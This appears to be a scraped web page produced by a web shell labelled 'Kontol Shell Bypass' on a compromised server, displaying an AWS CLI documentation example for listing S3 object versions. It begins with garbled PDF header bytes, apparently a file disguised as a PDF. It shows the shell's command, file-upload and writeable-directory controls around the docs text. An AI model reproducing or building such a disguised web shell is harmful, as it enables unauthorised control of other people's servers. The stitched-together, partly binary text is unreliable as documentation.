%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /usr/share/doc/awscli/examples/s3api/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : //usr/share/doc/awscli/examples/s3api/list-object-versions.rst
The following command retrieves version information for an object in a bucket named ``my-bucket``::

  aws s3api list-object-versions --bucket my-bucket --prefix index.html

Output::

  {
      "DeleteMarkers": [
          {
              "Owner": {
                  "DisplayName": "my-username",
                  "ID": "7009a8971cd660687538875e7c86c5b672fe116bd438f46db45460ddcd036c32"
              },
              "IsLatest": true,
              "VersionId": "B2VsEK5saUNNHKcOAJj7hIE86RozToyq",
              "Key": "index.html",
              "LastModified": "2015-11-10T00:57:03.000Z"
          },
          {
              "Owner": {
                  "DisplayName": "my-username",
                  "ID": "7009a8971cd660687538875e7c86c5b672fe116bd438f46db45460ddcd036c32"
              },
              "IsLatest": false,
              "VersionId": ".FLQEZscLIcfxSq.jsFJ.szUkmng2Yw6",
              "Key": "index.html",
              "LastModified": "2015-11-09T23:32:20.000Z"
          }
      ],
      "Versions": [
          {
              "LastModified": "2015-11-10T00:20:11.000Z",
              "VersionId": "Rb_l2T8UHDkFEwCgJjhlgPOZC0qJ.vpD",
              "ETag": "\"0622528de826c0df5db1258a23b80be5\"",
              "StorageClass": "STANDARD",
              "Key": "index.html",
              "Owner": {
                  "DisplayName": "my-username",
                  "ID": "7009a8971cd660687538875e7c86c5b672fe116bd438f46db45460ddcd036c32"
              },
              "IsLatest": false,
              "Size": 38
          },
          {
              "LastModified": "2015-11-09T23:26:41.000Z",
              "VersionId": "rasWWGpgk9E4s0LyTJgusGeRQKLVIAFf",
              "ETag": "\"06225825b8028de826c0df5db1a23be5\"",
              "StorageClass": "STANDARD",
              "Key": "index.html",
              "Owner": {
                  "DisplayName": "my-username",
                  "ID": "7009a8971cd660687538875e7c86c5b672fe116bd438f46db45460ddcd036c32"
              },
              "IsLatest": false,
              "Size": 38
          },
          {
              "LastModified": "2015-11-09T22:50:50.000Z",
              "VersionId": "null",
              "ETag": "\"d1f45267a863c8392e07d24dd592f1b9\"",
              "StorageClass": "STANDARD",
              "Key": "index.html",
              "Owner": {
                  "DisplayName": "my-username",
                  "ID": "7009a8971cd660687538875e7c86c5b672fe116bd438f46db45460ddcd036c32"
              },
              "IsLatest": false,
              "Size": 533823
          }
      ]
  }

Kontol Shell Bypass